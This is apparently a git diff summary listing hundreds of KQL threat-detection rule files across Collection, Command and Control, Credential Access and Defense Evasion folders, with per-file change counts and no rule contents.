.../audio_capture_via_soundrecorder.kql | 22 +++++----- .../automated_collection_command_prompt.kql | 18 ++++---- .../clipboard_collection_with_xclip_tool.kql | 24 +++++----- ...lipboard_data_collection_via_osascript.kql | 22 +++++----- 
...h_password_for_exfiltration_with_7_zip.kql | 22 +++++----- ..._password_for_exfiltration_with_winzip.kql | 18 ++++---- .../compressed_file_creation_via_tar_exe.kql | 24 +++++----- ...compressed_file_extraction_via_tar_exe.kql | 24 +++++----- .../data_copied_to_clipboard_via_clip_exe.kql | 18 ++++---- .../esentutl_steals_browser_information.kql | 22 +++++----- ...iles_added_to_an_archive_using_rar_exe.kql | 22 +++++----- ...ous_output_via_compress_archive_cmdlet.kql | 20 ++++----- .../Collection/gui_input_capture_macos.kql | 22 +++++----- .../Collection/hacktool_adcspwn_execution.kql | 22 +++++----- .../hacktool_impacket_tools_execution.kql | 22 +++++----- ...ckup_for_system_registry_hives_enabled.kql | 24 +++++----- ...ential_smb_relay_attack_tool_execution.kql | 22 +++++----- ...tial_suspicious_activity_using_secedit.kql | 22 +++++----- ...owershell_get_clipboard_cmdlet_via_cli.kql | 18 ++++---- ...es_accessing_the_microphone_and_webcam.kql | 18 ++++---- ...ge_with_password_and_compression_level.kql | 24 +++++----- ...rmation_for_export_with_command_prompt.kql | 18 ++++---- .../screen_capture_activity_via_psr_exe.kql | 18 ++++---- KQL/rules/Collection/screen_capture_macos.kql | 22 +++++----- ...uspicious_camera_and_microphone_access.kql | 22 +++++----- ...lation_of_default_accounts_via_net_exe.kql | 22 +++++----- ...veeam_backup_database_suspicious_query.kql | 18 ++++---- ...tabase_credentials_dump_via_sqlcmd_exe.kql | 18 ++++---- ...ed_disableaidataanalysis_value_deleted.kql | 26 +++++------ ...indows_recall_feature_enabled_registry.kql | 26 +++++------ ...ows_recall_feature_enabled_via_reg_exe.kql | 28 ++++++------ .../winrar_compressing_dump_files.kql | 24 +++++----- ...inrar_execution_in_non_standard_folder.kql | 22 +++++----- ...i_cache_file_creation_by_uncommon_tool.kql | 22 +++++----- .../anydesk_temporary_artefact.kql | 26 +++++------ ...le_download_via_gfxdownloadwrapper_exe.kql | 18 ++++---- .../cloudflared_portable_execution.kql | 22 +++++----- 
.../cloudflared_quick_tunnel_execution.kql | 26 +++++------ ...cloudflared_tunnel_connections_cleanup.kql | 22 +++++----- .../cloudflared_tunnel_execution.kql | 22 +++++----- ...localtonet_tunneling_service_initiated.kql | 26 +++++------ ...onet_tunneling_service_initiated_linux.kql | 26 +++++------ .../curl_usage_on_linux.kql | 24 +++++----- ...entially_suspicious_directory_via_wget.kql | 18 ++++---- ..._download_and_execution_via_ieexec_exe.kql | 18 ++++---- ...ad_from_browser_process_via_inline_url.kql | 18 ++++---- ...nload_from_ip_based_url_via_certoc_exe.kql | 18 ++++---- ...ile_download_using_notepad_gup_utility.kql | 22 +++++----- .../file_download_via_certoc_exe.kql | 18 ++++---- .../finger_exe_execution.kql | 26 +++++------ ...assist_temporary_installation_artefact.kql | 26 +++++------ .../gzip_archive_decode_via_powershell.kql | 22 +++++----- .../hacktool_htran_natbypass_execution.kql | 18 ++++---- .../hacktool_inveigh_execution_artefacts.kql | 22 +++++----- ...b_relay_secrets_dump_module_indicators.kql | 22 +++++----- .../hacktool_sharpchisel_execution.kql | 22 +++++----- ...hacktool_silenttrinity_stager_dll_load.kql | 22 +++++----- ...acktool_silenttrinity_stager_execution.kql | 22 +++++----- ...ck_legit_rdp_session_to_move_laterally.kql | 22 +++++----- ...interchange_format_file_via_ldifde_exe.kql | 22 +++++----- .../installation_of_teamviewer_desktop.kql | 18 ++++---- ...ection_initiated_by_script_interpreter.kql | 22 +++++----- ...vestandaloneupdater_exe_proxy_download.kql | 20 ++++----- ...stsc_exe_execution_with_local_rdp_file.kql | 22 +++++----- ...m_process_located_in_suspicious_folder.kql | 22 +++++----- ...ication_initiated_to_portmap_io_domain.kql | 22 +++++----- ...k_connection_initiated_by_imewdbld_exe.kql | 18 ++++---- ...tially_suspicious_or_uncommon_location.kql | 18 ++++---- ...urewebsites_net_by_non_browser_process.kql | 18 ++++---- ...to_potential_dead_drop_resolver_domain.kql | 26 +++++------ 
...ection_initiated_by_script_interpreter.kql | 22 +++++----- .../port_forwarding_activity_via_ssh_exe.kql | 22 +++++----- .../potential_amazon_ssm_agent_hijacking.kql | 22 +++++----- ...ownload_cradles_usage_process_creation.kql | 22 +++++----- ...nload_via_powershell_invoke_webrequest.kql | 18 ++++---- ...oad_upload_activity_using_type_command.kql | 18 ++++---- ...emory_download_and_compile_of_payloads.kql | 18 ++++---- ...ntial_linux_amazon_ssm_agent_hijacking.kql | 22 +++++----- .../potential_rdp_tunneling_via_plink.kql | 18 ++++---- .../potential_rdp_tunneling_via_ssh.kql | 18 ++++---- ...tential_wizardupdate_malware_infection.kql | 18 ++++---- .../potential_xcsset_malware_infection.kql | 18 ++++---- ...cious_network_connection_to_notion_api.kql | 22 +++++----- .../potentially_suspicious_usage_of_qemu.kql | 20 ++++----- .../printbrm_zip_creation_of_extraction.kql | 18 ++++---- .../pua_3proxy_execution.kql | 22 +++++----- .../pua_chisel_tunneling_tool_execution.kql | 22 +++++----- .../pua_fast_reverse_proxy_frp_execution.kql | 22 +++++----- .../pua_iox_tunneling_tool_execution.kql | 22 +++++----- .../pua_netcat_suspicious_execution.kql | 22 +++++----- .../pua_ngrok_execution.kql | 26 +++++------ .../pua_nimgrab_execution.kql | 22 +++++----- .../pua_nps_tunneling_tool_execution.kql | 22 +++++----- .../quickassist_execution.kql | 22 +++++----- .../rdp_over_reverse_ssh_tunnel.kql | 18 ++++---- .../rdp_to_http_or_https_target_ports.kql | 18 ++++---- .../remote_access_tool_anydesk_execution.kql | 26 +++++------ ...ydesk_execution_from_suspicious_folder.kql | 26 +++++------ ...ss_tool_anydesk_piped_password_via_cli.kql | 24 +++++----- ...ccess_tool_anydesk_silent_installation.kql | 22 +++++----- ...emote_access_tool_gotoassist_execution.kql | 26 +++++------ .../remote_access_tool_logmein_execution.kql | 26 +++++------ ...gent_command_execution_via_meshcentral.kql | 24 +++++----- ...emote_access_tool_netsupport_execution.kql | 26 +++++------ 
...ol_potential_meshagent_execution_macos.kql | 26 +++++------ ..._potential_meshagent_execution_windows.kql | 26 +++++------ ...tool_renamed_meshagent_execution_macos.kql | 22 +++++----- ...ol_renamed_meshagent_execution_windows.kql | 22 +++++----- ...te_access_tool_screenconnect_execution.kql | 26 +++++------ ...al_suspicious_remote_command_execution.kql | 22 +++++----- ...mote_access_tool_simple_help_execution.kql | 26 +++++------ ...potentially_attacker_controlled_server.kql | 26 +++++------ ...mote_access_tool_ultraviewer_execution.kql | 26 +++++------ ...download_via_desktopimgdownldr_utility.kql | 18 ++++---- .../renamed_cloudflared_exe_execution.kql | 18 ++++---- ...ed_visual_studio_code_tunnel_execution.kql | 18 ++++---- ...e_code_tunnel_execution_file_indicator.kql | 18 ++++---- .../Command and Control/replace_exe_usage.kql | 18 ++++---- ...onnect_temporary_installation_artefact.kql | 26 +++++------ .../suspicious_binary_writes_via_anydesk.kql | 22 +++++----- ...suspicious_certreq_command_to_download.kql | 26 +++++------ ...d_process_of_manage_engine_servicedesk.kql | 22 +++++----- ...spicious_curl_change_user_agents_linux.kql | 24 +++++----- .../suspicious_curl_exe_download.kql | 18 ++++---- .../suspicious_desktopimgdownldr_command.kql | 22 +++++----- ...spicious_desktopimgdownldr_target_file.kql | 22 +++++----- ..._download_and_compress_into_a_cab_file.kql | 18 ++++---- ...suspicious_download_from_office_domain.kql | 22 +++++----- .../suspicious_dropbox_api_usage.kql | 22 +++++----- .../suspicious_extrac32_execution.kql | 18 ++++---- ...usage_on_gzip_archive_process_creation.kql | 22 +++++----- ...suspicious_invoke_webrequest_execution.kql | 18 ++++---- ...oke_webrequest_execution_with_directip.kql | 18 ++++---- ...stsc_exe_execution_with_local_rdp_file.kql | 22 +++++----- ..._network_communication_with_google_api.kql | 22 +++++----- ...etwork_communication_with_telegram_api.kql | 22 +++++----- .../suspicious_plink_port_forwarding.kql | 22 +++++----- 
.../suspicious_tscon_start_as_system.kql | 18 ++++---- .../suspicious_velociraptor_child_process.kql | 22 +++++----- .../teamviewer_remote_session.kql | 22 +++++----- .../tor_client_browser_execution.kql | 18 ++++---- ...k_connection_initiated_by_certutil_exe.kql | 20 ++++----- ...use_of_ultravnc_remote_access_software.kql | 22 +++++----- .../visual_studio_code_tunnel_execution.kql | 22 +++++----- ...tudio_code_tunnel_remote_file_creation.kql | 18 ++++---- ...tudio_code_tunnel_service_installation.kql | 22 +++++----- ...ual_studio_code_tunnel_shell_execution.kql | 22 +++++----- .../wget_creating_files_in_tmp_directory.kql | 22 +++++----- ...rency_wallets_by_uncommon_applications.kql | 30 ++++++------- ..._sysvol_files_by_uncommon_applications.kql | 18 ++++---- ..._history_file_by_uncommon_applications.kql | 20 ++++----- ...i_master_keys_by_uncommon_applications.kql | 20 ++++----- .../browser_started_with_remote_debugging.kql | 18 ++++---- .../capture_credentials_with_rpcping_exe.kql | 22 +++++----- .../certificate_exported_via_powershell.kql | 22 +++++----- ...mp_files_from_remote_share_via_cmd_exe.kql | 18 ++++---- .../copy_passwd_or_shadow_from_tmp_path.kql | 18 ++++---- ...g_sensitive_files_with_credential_data.kql | 22 +++++----- .../cred_dump_tools_dropped_files.kql | 22 +++++----- ...anager_access_by_uncommon_applications.kql | 24 +++++----- ...dentials_from_password_stores_keychain.kql | 22 +++++----- .../credentials_in_files.kql | 18 ++++---- .../credui_dll_loaded_by_uncommon_process.kql | 22 +++++----- ...ys_and_certificate_export_activity_ioc.kql | 22 +++++----- ...dumping_of_sensitive_hives_via_reg_exe.kql | 22 +++++----- .../dumping_process_via_sqldumper_exe.kql | 22 +++++----- ...umeration_for_3rd_party_creds_from_cli.kql | 18 ++++---- ...numeration_for_credentials_in_registry.kql | 22 +++++----- .../esentutl_gather_credentials.kql | 22 +++++----- ...entutl_volume_shadow_copy_service_keys.kql | 18 ++++---- ...ccess_of_signal_desktop_sensitive_data.kql 
| 28 ++++++------ .../findstr_gpp_passwords.kql | 18 ++++---- .../hacktool_crackmapexec_file_indicators.kql | 18 ++++---- ...hacktool_crackmapexec_process_patterns.kql | 18 ++++---- ...ol_dumpert_process_dumper_default_file.kql | 22 +++++----- ...ktool_dumpert_process_dumper_execution.kql | 22 +++++----- .../hacktool_execution_pe_metadata.kql | 22 +++++----- ...ool_hashcat_password_cracker_execution.kql | 22 +++++----- ...ol_hydra_password_bruteforce_execution.kql | 22 +++++----- .../hacktool_impacket_file_indicators.kql | 18 ++++---- .../hacktool_inveigh_execution.kql | 22 +++++----- .../hacktool_krbrelay_execution.kql | 22 +++++----- .../hacktool_lazagne_execution.kql | 24 +++++----- .../hacktool_mimikatz_execution.kql | 22 +++++----- .../hacktool_mimikatz_kirbi_file_creation.kql | 22 +++++----- .../hacktool_nppspy_hacktool_usage.kql | 18 ++++---- ...a_crackmapexec_or_impacket_secretsdump.kql | 18 ++++---- ..._pypykatz_credentials_dumping_activity.kql | 18 ++++---- .../hacktool_quarks_pwdump_execution.kql | 22 +++++----- .../hacktool_quarkspwdump_dump_file.kql | 18 ++++---- .../hacktool_remotekrbrelay_execution.kql | 22 +++++----- .../hacktool_safetykatz_dump_indicator.kql | 22 +++++----- .../hacktool_safetykatz_execution.kql | 22 +++++----- .../hacktool_securityxploded_execution.kql | 22 +++++----- ..._typical_hivenightmare_sam_file_export.kql | 22 +++++----- .../hacktool_winpwn_execution.kql | 18 ++++---- ...resting_service_enumeration_via_sc_exe.kql | 20 ++++----- ...irectory_diagnostic_tool_ntdsutil_exe_.kql | 22 +++++----- ...ed_module_enumeration_via_tasklist_exe.kql | 22 +++++----- .../lsass_dump_keyword_in_commandline.kql | 22 +++++----- ...request_via_dumptype_registry_settings.kql | 22 +++++----- ...ess_dump_artefact_in_crashdumps_folder.kql | 22 +++++----- ...s_memory_dump_creation_via_taskmgr_exe.kql | 22 +++++----- .../lsass_process_memory_dump_files.kql | 18 ++++---- ...process_reconnaissance_via_findstr_exe.kql | 18 ++++---- 
...soft_iis_connection_strings_decryption.kql | 18 ++++---- ...ft_iis_service_account_password_dumped.kql | 18 ++++---- ...e_file_access_by_uncommon_applications.kql | 18 ++++---- ...mount_execution_with_hidepid_parameter.kql | 18 ++++---- ...neric_credentials_added_via_cmdkey_exe.kql | 24 +++++----- .../Credential Access/ntds_dit_created.kql | 18 ++++---- ...it_creation_by_uncommon_parent_process.kql | 18 ++++---- .../ntds_dit_creation_by_uncommon_process.kql | 18 ++++---- .../ntds_exfiltration_filename_patterns.kql | 18 ++++---- ...uration_reconnaissance_via_findstr_exe.kql | 20 ++++----- .../potential_browser_data_stealing.kql | 22 +++++----- ..._attempt_using_new_networkprovider_cli.kql | 22 +++++----- ..._attempt_using_new_networkprovider_reg.kql | 22 +++++----- ...ential_dumping_via_lsass_process_clone.kql | 18 ++++---- ..._via_lsass_silentprocessexit_technique.kql | 22 +++++----- .../potential_credential_dumping_via_wer.kql | 22 +++++----- ..._sniffing_activity_using_network_tools.kql | 26 +++++------ ...istory_access_attempt_via_history_file.kql | 24 +++++----- ..._for_cached_credentials_via_cmdkey_exe.kql | 22 +++++----- .../potential_sam_database_dump.kql | 22 +++++----- ...tential_spn_enumeration_via_setspn_exe.kql | 22 +++++----- ...fender_av_bypass_via_dump64_exe_rename.kql | 20 ++++----- ...ommand_targeting_teams_sensitive_files.kql | 20 ++++----- ...con_activity_using_log_query_utilities.kql | 24 +++++----- ...ly_suspicious_jwt_token_search_via_cli.kql | 22 +++++----- ...ally_suspicious_odbc_driver_registered.kql | 22 +++++----- .../powershell_get_process_lsass.kql | 18 ++++---- .../Credential Access/powershell_sam_copy.kql | 24 +++++----- ...s_reconnaissance_via_commandline_tools.kql | 18 ++++---- ...rocess_memory_dump_via_rdrleakdiag_exe.kql | 22 +++++----- .../pua_dit_snapshot_viewer.kql | 22 +++++----- .../pua_mouse_lock_execution.kql | 22 +++++----- .../pua_webbrowserpassview_execution.kql | 22 +++++----- 
...stry_export_of_third_party_credentials.kql | 20 ++++----- .../renamed_browsercore_exe_execution.kql | 18 ++++---- .../sensitive_file_dump_via_wbadmin_exe.kql | 24 +++++----- ...e_recovery_from_backup_via_wbadmin_exe.kql | 20 ++++----- ...tion_using_operating_systems_utilities.kql | 22 +++++----- ...sqlite_chromium_profile_data_db_access.kql | 18 ++++---- .../sqlite_firefox_profile_data_db_access.kql | 18 ++++---- ...e_access_to_browser_credential_storage.kql | 30 ++++++------- .../suspicious_history_file_operations.kql | 24 +++++----- .../suspicious_key_manager_access.kql | 22 +++++----- ...icious_process_patterns_ntds_dit_exfil.kql | 18 ++++---- .../suspicious_reg_add_open_command.kql | 18 ++++---- .../suspicious_serv_u_process_pattern.kql | 22 +++++----- ...uspicious_system_user_process_creation.kql | 26 +++++------ ...ious_sysvol_domain_group_policy_access.kql | 22 +++++----- ..._application_related_objectacess_event.kql | 18 ++++---- ...irectory_diagnostic_tool_ntdsutil_exe_.kql | 24 +++++----- ...shadowcopy_symlink_creation_via_mklink.kql | 22 +++++----- .../wce_wceaux_dll_access.kql | 18 ++++---- .../werfault_lsass_process_memory_dump.kql | 18 ++++---- .../windows_credential_editor_registry.kql | 18 ++++---- ...credential_manager_access_via_vaultcmd.kql | 18 ++++---- ...p_file_created_by_uncommon_application.kql | 18 ++++---- ...rivilege_by_arbitrary_parent_processes.kql | 18 ++++---- .../abusing_print_executable.kql | 18 ++++---- ...add_insecure_download_source_to_winget.kql | 24 +++++----- .../add_new_download_source_to_winget.kql | 22 +++++----- ...spicious_new_download_source_to_winget.kql | 18 ++++---- .../add_safeboot_keys_via_reg_utility.kql | 22 +++++----- ..._exe_execution_from_uncommon_directory.kql | 18 ++++---- ...tifier_deleted_by_uncommon_application.kql | 22 +++++----- .../agentexecutor_powershell_execution.kql | 22 +++++----- ...levated_msi_spawned_cmd_and_powershell.kql | 18 ++++---- ...ays_install_elevated_windows_installer.kql | 26 
+++++------ .../amsi_dll_loaded_via_lolbin_process.kql | 18 ++++---- ...river_disallowed_on_dev_drive_registry.kql | 22 +++++----- ...r_csproj_code_execution_via_dotnet_exe.kql | 22 +++++----- ...bitrary_file_download_via_imewdbld_exe.kql | 18 ++++---- ...ary_file_download_via_msedge_proxy_exe.kql | 18 ++++---- ...bitrary_file_download_via_msohtmed_exe.kql | 18 ++++---- .../arbitrary_file_download_via_mspub_exe.kql | 18 ++++---- ...file_download_via_presentationhost_exe.kql | 18 ++++---- ...bitrary_file_download_via_squirrel_exe.kql | 22 +++++----- ...work_service_potential_dll_sideloading.kql | 18 ++++---- .../aspnetcompiler_execution.kql | 18 ++++---- ...sembly_loading_via_cl_loadassembly_ps1.kql | 18 ++++---- .../audit_policy_tampering_via_auditpol.kql | 24 +++++----- ...tampering_via_nt_resource_kit_auditpol.kql | 24 +++++----- .../audit_rules_deleted_via_auditctl.kql | 26 +++++------ ...bs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql | 22 +++++----- ...d_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql | 22 +++++----- .../baaupdate_exe_suspicious_dll_load.kql | 22 +++++----- ...cial_processes_with_improper_arguments.kql | 26 +++++------ ...64_encoded_powershell_command_detected.kql | 22 +++++----- .../Defense Evasion/binary_padding_macos.kql | 22 +++++----- .../bitlockertogo_exe_execution.kql | 28 ++++++------ .../browser_execution_in_headless_mode.kql | 18 ++++---- .../bypass_uac_via_fodhelper_exe.kql | 22 +++++----- .../c_il_code_compilation_via_ilasm_exe.kql | 18 ++++---- .../certificate_exported_via_certutil_exe.kql | 22 +++++----- ...channel_access_permission_via_registry.kql | 18 ++++---- .../chmod_suspicious_directory.kql | 22 +++++----- .../Defense Evasion/clear_linux_logs.kql | 22 +++++----- .../cmstp_execution_process_creation.kql | 22 +++++----- .../cmstp_execution_registry_event.kql | 22 +++++----- .../cobaltstrike_load_by_rundll32.kql | 18 ++++---- .../code_execution_via_pcwutl_dll.kql | 22 +++++----- ...ation_via_mode_com_to_russian_language.kql | 24 
+++++----- .../com_object_execution_via_xwizard_exe.kql | 20 ++++----- .../Defense Evasion/connection_proxy.kql | 22 +++++----- ...urestring_cmdlet_usage_via_commandline.kql | 22 +++++----- .../createdump_process_dump.kql | 22 +++++----- .../creation_of_non_existent_system_dll.kql | 20 ++++----- .../curl_download_and_execute_combination.kql | 18 ++++---- ..._file_open_handler_executes_powershell.kql | 18 ++++---- .../decode_base64_encoded_text.kql | 22 +++++----- .../decode_base64_encoded_text_macos.kql | 22 +++++----- ...scan_shellex_context_menu_registry_key.kql | 22 +++++----- .../devicecredentialdeployment_execution.kql | 22 +++++----- ...launcher_exe_executes_specified_binary.kql | 22 +++++----- ...ibrary_sdiageng_dll_loaded_by_msdt_exe.kql | 18 ++++---- .../directory_removal_via_rmdir.kql | 24 +++++----- ...ore_mode_dsrm_registry_value_tampering.kql | 28 ++++++------ ...ministrative_share_creation_at_startup.kql | 18 ++++---- ...network_protection_on_windows_defender.kql | 18 ++++---- .../disable_macro_runtime_scan_scope.kql | 18 ++++---- ...crosoft_defender_firewall_via_registry.kql | 18 ++++---- .../disable_or_stop_services.kql | 22 +++++----- ...rivacy_settings_experience_in_registry.kql | 22 +++++----- ...ble_pua_protection_on_windows_defender.kql | 18 ++++---- .../disable_security_tools.kql | 22 +++++----- ..._tamper_protection_on_windows_defender.kql | 18 ++++---- ...indows_defender_av_security_monitoring.kql | 22 +++++----- ...nder_functionalities_via_registry_keys.kql | 24 +++++----- ...ble_windows_event_logging_via_registry.kql | 22 +++++----- .../disable_windows_firewall_by_registry.kql | 18 ++++---- .../disable_windows_iis_http_logging.kql | 18 ++++---- .../disabled_ie_security_features.kql | 18 ++++---- .../disabled_volume_snapshots.kql | 22 +++++----- .../disabled_windows_defender_eventlog.kql | 22 +++++----- .../disabling_security_tools.kql | 22 +++++----- ...der_wmi_autologger_session_via_reg_exe.kql | 26 +++++------ 
...ion_from_potential_suspicious_location.kql | 22 +++++----- ...de_uncommon_script_extension_execution.kql | 24 +++++----- .../dism_remove_online_package.kql | 22 +++++----- ...splaying_hidden_files_feature_disabled.kql | 20 ++++----- .../dll_execution_via_rasautou_exe.kql | 22 +++++----- ...stem_process_from_suspicious_locations.kql | 18 ++++---- ...from_suspicious_location_via_cmspt_exe.kql | 22 +++++----- .../dll_loaded_via_certoc_exe.kql | 18 ++++---- .../dll_sideloading_of_shellchromeapi_dll.kql | 20 ++++----- ...erserver_function_call_via_msiexec_exe.kql | 18 ++++---- ...r_dll_loaded_by_scripting_applications.kql | 18 ++++---- ..._to_disallowed_images_in_hvci_registry.kql | 22 +++++----- ...iver_dll_installation_via_odbcconf_exe.kql | 22 +++++----- ...naries_into_spool_drivers_color_folder.kql | 18 ++++---- .../dumpminitool_execution.kql | 18 ++++---- .../dumpstack_log_defender_evasion.kql | 18 ++++---- .../dynamic_csharp_compile_artefact.kql | 22 +++++----- .../dynamic_net_compilation_via_csc_exe.kql | 26 +++++------ ...ocal_manifest_installation_with_winget.kql | 22 +++++----- ...nymous_computer_allowanonymouscallback.kql | 22 +++++----- ...syslog_configuration_change_via_esxcli.kql | 22 +++++----- ...amper_in_net_processes_via_commandline.kql | 24 +++++----- .../etw_trace_evasion_activity.kql | 18 ++++---- .../eventlog_evtx_file_deleted.kql | 18 ++++---- .../evtx_created_in_uncommon_location.kql | 28 ++++++------ ...ange_powershell_cmdlet_history_deleted.kql | 22 +++++----- .../execute_files_with_msdeploy_exe.kql | 22 +++++----- .../execute_from_alternate_data_streams.kql | 18 ++++---- ...execute_pcwrun_exe_to_leverage_follina.kql | 22 +++++----- .../execution_dll_of_choice_using_wab_exe.kql | 18 ++++---- .../execution_of_non_existing_file.kql | 18 ++++---- ...tion_of_suspicious_file_type_extension.kql | 20 ++++----- .../execution_via_stordiag_exe.kql | 22 +++++----- .../execution_via_workfolders_exe.kql | 22 +++++----- .../explorer_process_tree_break.kql 
| 20 ++++----- ...coded_from_base64_hex_via_certutil_exe.kql | 18 ++++---- .../file_deleted_via_sysinternals_sdelete.kql | 22 +++++----- KQL/rules/Defense Evasion/file_deletion.kql | 22 +++++----- .../Defense Evasion/file_deletion_via_del.kql | 28 ++++++------ ...ile_download_using_protocolhandler_exe.kql | 18 ++++---- .../file_download_via_bitsadmin.kql | 22 +++++----- ...itsadmin_to_a_suspicious_target_folder.kql | 18 ++++---- ...bitsadmin_to_an_uncommon_target_folder.kql | 18 ++++---- .../file_download_via_installutil_exe.kql | 18 ++++---- .../file_download_via_nscurl_macos.kql | 22 +++++----- ...load_via_windows_defender_mpcmprun_exe.kql | 18 ++++---- .../file_download_with_headless_browser.kql | 18 ++++---- ...ile_encoded_to_base64_via_certutil_exe.kql | 22 +++++----- ...ion_encoded_to_base64_via_certutil_exe.kql | 18 ++++---- .../file_time_attribute_change.kql | 18 ++++---- ...ous_extension_downloaded_via_bitsadmin.kql | 18 ++++---- ...stem_dll_name_in_unsuspected_locations.kql | 24 +++++----- ..._process_name_in_unsuspected_locations.kql | 26 +++++------ .../filter_driver_unloaded_via_fltmc_exe.kql | 18 ++++---- .../findstr_launching_lnk_file.kql | 18 ++++---- .../firewall_disabled_via_netsh_exe.kql | 22 +++++----- .../firewall_rule_deleted_via_netsh_exe.kql | 24 +++++----- .../firewall_rule_update_via_netsh_exe.kql | 24 +++++----- .../flush_iptables_ufw_chain.kql | 22 +++++----- ...t_guard_protectedfolders_list_registry.kql | 22 +++++----- ...orfiles_exe_child_process_masquerading.kql | 18 ++++---- .../fsutil_suspicious_invocation.kql | 26 +++++------ .../gatekeeper_bypass_via_xattr.kql | 22 +++++----- .../Defense Evasion/gpscript_execution.kql | 22 +++++----- .../greedy_file_deletion_using_del.kql | 18 ++++---- .../hacktool_edrsilencer_execution.kql | 22 +++++----- .../hacktool_empire_powershell_uac_bypass.kql | 18 ++++---- .../hacktool_f_secure_c3_load_by_rundll32.kql | 18 ++++---- ...rootkit_detector_and_remover_execution.kql | 22 +++++----- 
.../hacktool_krbrelayup_execution.kql | 22 +++++----- .../hacktool_powertool_execution.kql | 22 +++++----- .../hacktool_rubeus_execution.kql | 22 +++++----- .../hacktool_sharpevtmute_execution.kql | 18 ++++---- ...ool_wmiexec_default_powershell_command.kql | 22 +++++----- .../hacktool_xordump_execution.kql | 22 +++++----- .../Defense Evasion/hh_exe_execution.kql | 22 +++++----- ...et_on_file_directory_via_chflags_macos.kql | 24 +++++----- .../Defense Evasion/hidden_user_creation.kql | 22 +++++----- ...e_schedule_task_via_index_value_tamper.kql | 24 +++++----- .../hiding_files_with_attrib_exe.kql | 24 +++++----- ...count_via_specialaccounts_registry_key.kql | 18 ++++---- ...ecialaccounts_registry_key_commandline.kql | 22 +++++----- ...l_help_hh_exe_suspicious_child_process.kql | 18 ++++---- ...visor_enforced_code_integrity_disabled.kql | 18 ++++---- ...r_enforced_paging_translation_disabled.kql | 18 ++++---- ..._to_mycomputer_zone_for_http_protocols.kql | 18 ++++---- .../iis_webserver_access_logs_deleted.kql | 24 +++++----- ...log_deletion_via_commandline_utilities.kql | 26 +++++------ ...devices_unusual_parent_child_processes.kql | 18 ++++---- ..._removal_on_host_clear_mac_system_logs.kql | 22 +++++----- ...cution_by_program_compatibility_wizard.kql | 24 +++++----- ...xecution_from_script_file_via_bash_exe.kql | 20 ++++----- ..._inline_command_execution_via_bash_exe.kql | 20 ++++----- .../infdefaultinstall_exe_inf_execution.kql | 18 ++++---- ...itive_subfolder_search_via_findstr_exe.kql | 22 +++++----- ..._new_package_via_winget_local_manifest.kql | 26 +++++------ .../install_root_certificate.kql | 22 +++++----- ...lorer_disablefirstruncustomize_enabled.kql | 22 +++++----- .../invoke_obfuscation_clip_launcher.kql | 18 ++++---- ...nvoke_obfuscation_compress_obfuscation.kql | 18 ++++---- ..._obfuscation_obfuscated_iex_invocation.kql | 18 ++++---- .../invoke_obfuscation_stdin_launcher.kql | 18 ++++---- .../invoke_obfuscation_var_launcher.kql | 18 ++++---- 
...e_obfuscation_var_launcher_obfuscation.kql | 18 ++++---- .../invoke_obfuscation_via_stdin.kql | 18 ++++---- .../invoke_obfuscation_via_use_clip.kql | 18 ++++---- .../invoke_obfuscation_via_use_mshta.kql | 18 ++++---- .../jscript_compiler_execution.kql | 24 +++++----- ...kavremover_dropped_binary_lolbin_usage.kql | 18 ++++---- .../kernel_memory_dump_via_livekd.kql | 22 +++++----- .../launch_vsdevshell_ps1_proxy_execution.kql | 22 +++++----- ...legitimate_application_dropped_archive.kql | 18 ++++---- ...itimate_application_dropped_executable.kql | 18 ++++---- .../legitimate_application_dropped_script.kql | 18 ++++---- .../linux_base64_encoded_pipe_to_shell.kql | 22 +++++----- .../linux_base64_encoded_shebang_in_cli.kql | 22 +++++----- .../linux_doas_conf_file_creation.kql | 22 +++++----- .../linux_doas_tool_execution.kql | 22 +++++----- .../linux_package_uninstall.kql | 22 +++++----- .../linux_shell_pipe_to_shell.kql | 22 +++++----- .../livekd_driver_creation.kql | 22 +++++----- ...kd_driver_creation_by_uncommon_process.kql | 22 +++++----- ...livekd_kernel_memory_dump_file_created.kql | 22 +++++----- ...ol_binary_copied_from_system_directory.kql | 18 ++++---- .../lolbin_runexehelper_use_as_proxy.kql | 18 ++++---- .../lolbin_unregmp2_exe_use_as_proxy.kql | 18 ++++---- ...sa_ppl_protection_disabled_via_reg_exe.kql | 22 +++++----- ...on_by_microsoft_visual_studio_debugger.kql | 26 +++++------ ...nents_file_execution_by_taef_detection.kql | 24 +++++----- ...inject_inject_dll_into_running_process.kql | 18 ++++---- .../maxmpxct_registry_value_changed.kql | 22 +++++----- .../microsoft_office_dll_sideload.kql | 22 +++++----- ...crosoft_office_protected_view_disabled.kql | 22 +++++----- .../modify_group_policy_settings.kql | 22 +++++----- .../msdt_execution_via_answer_file.kql | 22 +++++----- ...cution_with_suspicious_file_extensions.kql | 28 ++++++------ ...ll_runhtmlapplication_suspicious_usage.kql | 22 +++++----- .../msiexec_quiet_installation.kql | 24 +++++----- 
.../Defense Evasion/msiexec_web_install.kql | 22 +++++----- .../Defense Evasion/msxsl_exe_execution.kql | 24 +++++----- ..._policy_on_microsoft_defender_firewall.kql | 22 +++++----- ..._connection_initiated_by_addinutil_exe.kql | 20 ++++----- ...capture_session_launched_via_dxcap_exe.kql | 22 +++++----- .../new_dll_registered_via_odbcconf_exe.kql | 22 +++++----- .../new_file_association_using_exefile.kql | 18 ++++---- .../new_firewall_rule_added_via_netsh_exe.kql | 24 +++++----- .../new_process_created_via_taskmgr_exe.kql | 22 +++++----- ..._certificate_installed_via_certmgr_exe.kql | 24 +++++----- ...certificate_installed_via_certutil_exe.kql | 24 +++++----- .../node_process_executions.kql | 18 ++++---- ...rshell_download_cradle_processcreation.kql | 18 ++++---- .../ntdllpipe_like_activity_execution.kql | 18 ++++---- ...l_msi_install_via_windowsinstaller_com.kql | 26 +++++------ ...fuscated_powershell_oneliner_execution.kql | 18 ++++---- .../odbcconf_exe_suspicious_dll_location.kql | 22 +++++----- ...network_connection_over_uncommon_ports.kql | 22 +++++----- ...tls1_0_tls1_1_protocol_version_enabled.kql | 22 +++++----- ...nt_file_dropped_in_suspicious_location.kql | 22 +++++----- ...xecution_of_malicious_embedded_scripts.kql | 24 +++++----- ...openwith_exe_executes_specified_binary.kql | 18 ++++---- ...work_connection_initiated_by_cmstp_exe.kql | 20 ++++----- ...k_connection_to_public_ip_via_winlogon.kql | 22 +++++----- .../outgoing_logon_with_new_credentials.kql | 22 +++++----- ...rd_provided_in_command_line_of_net_exe.kql | 18 ++++---- .../pdf_file_created_by_regedit_exe.kql | 24 +++++----- KQL/rules/Defense Evasion/ping_hex_ip.kql | 22 +++++----- 